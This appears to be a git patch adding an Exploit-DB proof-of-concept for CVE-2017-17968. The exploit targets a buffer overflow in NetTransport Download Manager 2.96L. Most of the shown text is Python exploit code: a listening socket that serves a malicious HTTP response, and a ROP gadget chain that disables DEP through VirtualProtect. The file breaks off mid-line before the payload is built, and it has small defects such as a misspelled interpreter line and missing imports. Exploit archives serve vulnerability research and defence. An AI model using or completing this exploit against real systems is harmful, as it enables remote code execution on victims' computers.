From b3eb5f7be04948d52dd6222ee9bc600b1dc4561e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 30 Dec 2017 05:02:21 +0000
Subject: [PATCH] DB: 2017-12-30 1 changes to exploits/shellcodes NetTransport 2.96L - Buffer Overflow (DEP Bypass)
---
 exploits/windows/remote/43408.py | 119 +++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 120 insertions(+)
 create mode 100755 exploits/windows/remote/43408.py
diff --git a/exploits/windows/remote/43408.py b/exploits/windows/remote/43408.py
new file mode 100755
index 000000000..d3912ae33
--- /dev/null
+++ b/exploits/windows/remote/43408.py
@@ -0,0 +1,119 @@
+# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
+# CVE: CVE-2017-17968
+# Date: 28-12-2017
+# Software Link: http://xi-soft.com/downloads/NXSetup_x86.zip
+# Exploit Author: Author: Aloyce J. Makalanga
+# Contact: https://twitter.com/aloycemjr
+# Vendor Homepage: http://xi-soft.com/default.htm
+# Category: webapps
+# Impact: Code execution
+
+1. Description
+
+A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
+
+2. Proof of Concept
+
+
+#!/usr/bin/pythion
+
+
+
+
+def main():
+ host = "192.168.205.131"
+ port = 80
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind((host, port))
+ s.listen(1)
+ print "\n[+] Listening on %d ..." 
% port
+
+ cl, addr = s.accept()
+ print "[+] Connection accepted from %s" % addr[0]
+
+ #Disabling DEP by VirtualProtect()
+ def create_rop_chain():
+ # rop chain generated with mona.py - www.corelan.be
+ rop_gadgets = [
+ 0x10001653, # POP EAX # RETN [libssl.dll]
+ 0x00485ed3,# MOV EAX,DWORD PTR DS:[ECX] # POP EDI # POP ESI # POP EBP # POP ECX # RETN 0x04 [NetTransport.exe]
+ 0x41414141, # Filler (compensate)
+ 0x41414141, # Filler (compensate)
+ 0x41414141, # Filler (compensate)
+ 0x41414141, # Filler (compensate)
+ 0x00496596, # XCHG EAX,ESI # RETN 0x0A [NetTransport.exe]
+ 0x41414141, # Filler (RETN offset compensation)
+ 0x004ea919, # POP EBP # RETN [NetTransport.exe]
+ 0x41414141, # Filler (RETN offset compensation)
+ 0x41414141, # Filler (RETN offset compensation)
+ 0x4141, # Filler (RETN offset compensation)
+ 0x004608df, # & push esp # ret [NetTransport.exe]
+ 0x0045e75f, # POP EBX # RETN [NetTransport.exe]
+ 0x00000201, # 0x00000201-> ebx
+ 0x00554dbc, # POP ECX # RETN [NetTransport.exe]
+ 0x00000040, # 0x00000040-> edx
+ 0x00499c92, # XOR EDX,EDX # RETN 0x04 [NetTransport.exe]
+ 0x0041254c, # ADC EDX,ECX # POP EBX # ADD ESP,0C # RETN 0x04 [NetTransport.exe]
+ 0x41414141, # Filler (RETN offset compensation)
+ 0x41414141, # Filler (compensate)
+ 0x41414141, # Filler (compensate)
+ 0x41414141, # Filler (compensate)
+ 0x41414141, # Filler (compensate)
+ 0x0054e559, # POP ECX # RETN [NetTransport.exe]
+ 0x41414141, # Filler (RETN offset compensation)
+ 0x10004b93, # &Writable location [libssl.dll]
+ 0x0050343f, # POP EDI # RETN [NetTransport.exe]
+ 0x00487073, # RETN (ROP NOP) [NetTransport.exe]
+ 0x10001653, # POP EAX # RETN [libssl.dll]
+ 0x90909090, # nop
+ 0x00486f78, # PUSHAD # RETN [NetTransport.exe]
+ ]
+ return ''.join(struct.pack('